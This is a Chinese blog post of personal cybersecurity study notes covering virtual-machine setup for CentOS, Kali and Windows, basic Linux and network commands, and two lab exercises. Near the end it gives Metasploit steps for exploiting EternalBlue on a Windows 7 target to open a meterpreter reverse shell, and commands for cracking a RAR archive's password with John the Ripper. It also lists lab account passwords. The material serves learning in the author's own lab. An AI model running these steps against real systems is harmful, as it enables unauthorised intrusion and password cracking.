网页浏览总次数

星期四, 二月 22, 2024

网络安全学习笔记

以下内容都是学习过程中的截图,在虚拟机上运行。


VMWare虚拟机安装

Centos Linux7操作系统安装

Centos root账号root密码 centoslearn


 




用户账号 test 密码 test





使用root账号成功登录centos系统

 

快捷键

Ctrl+Alt   //切出虚拟机

Ctrl+Z      //停止ping

Eec+Shift+: //进入底行模式 编辑未保存文件的时候

Shift+:  //(已保存文件 进入底行模式)

 


命令(大小写敏感)

su root   //切换到root权限 需要重新输入root密码

pwd       //检查当前目录

cd 目录名  //进入目录

cd /       //返回根目录

cd ..      //返回上一级目录

ll           //列出目录全部文件

vi 文件名   //编辑文件

 


 


底行模式命令

q   //退出(已经保存过的文件)

%d  //清空文件

q!  //不保存退出(未保存文件)

wq  //保存退出

 

yum install -y net-tools  //安装net-tools网络工具

yum install -y vim        //安装vim

 

vim 文件名  //编辑文件(增删改查文件节目更好看)

 

 

 

配置虚拟机网络

1. 进入网络配置目录

cd /etc/sysconfig/network-scripts

2. 编辑文件ifcfg-ens33

vi ifcfg-ens33

3. 修改IP与网关等(以下图为例)

BOOTPROTO=static

ONBOOT=yes

IPADDR=192.168.179.200 //ip地址

NETMASK=255.255.255.0 //子网掩码

GATEWAY=192.168.179.2 //网关

DNS1=8.8.8.8 //DNS


 





VMWare 选择编辑-虚拟网路编辑器


 















选择NAT模式


 









DHCP设置查看ip地址范围


 
















NAT设置查看网关

4. 保存修改的信息

Esc+Shift+: 进入底行模式

底行模式输入保存并且退出命令wq

5. 重启网络并且检查网络是否连接成功

systemctl restart network //重启网络

ping baidu.com //检查网络

Ctrl+z //停止ping

6. 关闭防火墙

systemctl stop firewalld

7. 重启centos系统

reboot /init6

 

 

安装kali linux系统

1. 在虚拟机的我的计算机空白处右键 打开linux的解压好的系统文件

2. 选择 编辑虚拟机设置-选项

操作系统选Linux 版本选CentOS(如下图)


 

3. 启动虚拟机(自动安装kali系统)

4. 输入kali系统默认

用户kali密码kali

5.进入系统后 左上角可以查看自带的软件

6.启动终端后 输入命令

 

Win7安装注意

*操作系统要绿色的不带各种exe

引导 使用BIOS

Win10安装注意

取消 软盘-设备状态“已连接”和“启动时连接”

用户test密码test

 

重置kali root密码

输入命令

sudo passwd root

输入新密码 kali

再次确认新密码 kali

su root //切换到root

输入root密码 kali


 

 

 

 

 



 

(内网渗透)攻击win7 漏洞 EternalBlue(永恒之蓝)

1. 启动powershell,启动msf

msfconsole

2. 搜寻永恒之蓝漏洞

search ms17-010

3.使用永恒之蓝漏洞

use exploit/windows/smb/ms17_010_eternalblue

4.设置靶机IP

set rhost xxx.xxx.xxx.xxx

5. 设置攻击载荷

set payload windows/x64/meterpreter/reverse_tcp

6. 开始执行攻击

run

当返回meterpreter成功

7. 进入靶机的cmd

shell

8. 使用目标系统命令进行操作


 





9.后退到上一步

exit

 

 

 

Kali爆破rar压缩包密码

1. 确保在root权限

2. 安装rar

apt install rar

如果提示 就先更新一下资源

sudo apt-get -y update


 






3. 检查是否能拿到rarhash

rar2john name.rar

4. 生成hash文本

rar2john test.rar > hash.text

5. 根据hash文本爆破rar密码

john hash.text


 

 

 








没有评论:

发表评论